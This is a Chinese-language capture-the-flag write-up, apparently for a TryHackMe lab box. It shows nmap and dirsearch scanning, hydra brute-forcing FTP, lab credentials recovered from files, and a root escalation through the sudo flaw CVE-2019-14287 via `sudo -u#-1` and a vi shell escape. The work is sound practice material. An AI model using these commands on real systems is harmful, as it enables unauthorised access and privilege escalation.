看WriteUp打靶
nmap开扫
$ nmap -sC -sV -Pn 10.10.187.232
------------扫描结果-----------
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-21 21:13 CST
Nmap scan report for 10.10.187.232
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 a08b6b7809390332ea524c203e82ad60 (DSA)
| 2048 df25d0471f37d918818738763092651f (RSA)
| 256 be9f4f014a44c8adf503cb00ac8f4944 (ECDSA)
|_ 256 dbb1c1b9cd8c9d604ff198e299fe0803 (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.10 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.92 seconds
扫到了 21
和22
端口,先试一下 ftp服务有没有anonymous
登陆,呃,没有
访问网页:
apache默认界面,没啥有用的信息
$ dirsearch -u http://10.10.187.232/
扫描到一个文件夹 /assets/,访问是一个文件目录
RickRolled.mp4
和style.css
第一个是一个视频(前段时间很火的,同学给我说代表你被骗了的搞怪视频)
在看看style.css 文件
发现了一个“秘密文件”!!!不得了
/*
Nice to see someone checking the stylesheets.
Take a look at the page: /sup3r_s3cr3t_fl4g.php
*/
再访问 sup3r_s3cr3t_fl4g.php
弹框要求关闭 Javascript .
恼,又被那个男人骗了!!!
Love it when people block Javascript...
This is happening whether you like it or not... The hint is in the video. If you're stuck here then you're just going to have to bite the bullet!
Make sure your audio is turned up!
<那个视频[https://www.youtube.com/watch?v=dQw4w9WgXcQ]>(正是Rick Astley)
网页报错的意外发现
预期解应该是用Burp Suite抓包,然后再 Forward(放包)
再访问http://10.10.187.232/WExYY2Cv-qU,同样也是一个目录页。,只有一张名为Hot_Babe.png
的图片
没啥思路了,就把图片download下来。
exiftool
后没什么发现
再看看strings
,重大发现
Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
得到了ftp服务
的账号和密码"们",还需要爆破【又了解了一款工具】
hydra -h
看一下教程
先将上面发现的密码保存为文件pass.txt
$ hydra -l ftpuser -P pass.txt ftp://10.10.187.232/
--Get 到密码
[21][ftp] host: 10.10.187.232 login: ftpuser password: 5iez1wGXKfPKQ
连接ftp
服务,Bingo! 成功
dir
查看一下当前目录,有一个文件,先down下来再说。
查看 Eli’s_Creds.txt内容
$ cat Eli\'s_Creds.txt
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->-
--<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+
++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+
+++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++<
]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+
++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->---
--<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++
+<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+
++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++
<]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
<]>+. <+++[ ->--- <]>-- ---.- ----. <
在线解密brainfusk
,得到账号密码
User: eli
Password: DSpDiM1wAEwid
连接ssh服务
$ ssh eli@10.10.187.232
Bingo成功登陆,并收到一条message
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
Message提示我们有一个s3cr3t
文件(夹)被藏起来了
$ locate s3cr3t
/usr/games/s3cr3t
/usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
/var/www/html/sup3r_s3cr3t_fl4g.php
可以发现,在s3cr3t
文件夹下有一个隐藏文件,查看它
$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
同样的,也是一封信,信是Root
留下来的,说明了Gwendoline
的密码是 MniVCQVhQHUNI
在浏览eli的文件时发现了
在家目录/home/
下有两个文件夹:eli
和gwendoline
,说明另一个用户名为gwendoline
.
没发现其他的有用信息了,切换用户
$ su gwendoline
在gwendoline
文件夹下发现user.txt 得到第一个flag THM{xxxxxxxxxxxxxxxxxxxx}
sudo -l
$ sudo -l
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
这条路是走不通了。
太菜了,开始查看WP
$ sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
这个版本的sudo 是存在CVE的 CVE-2019-14287
漏洞介绍
当
sudo
的版本低于 <1.8.28
漏洞利用
$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
然后再在文件内输入 ":!/bin/sh" 就可以提升到root的shell了
flag在/root
目录下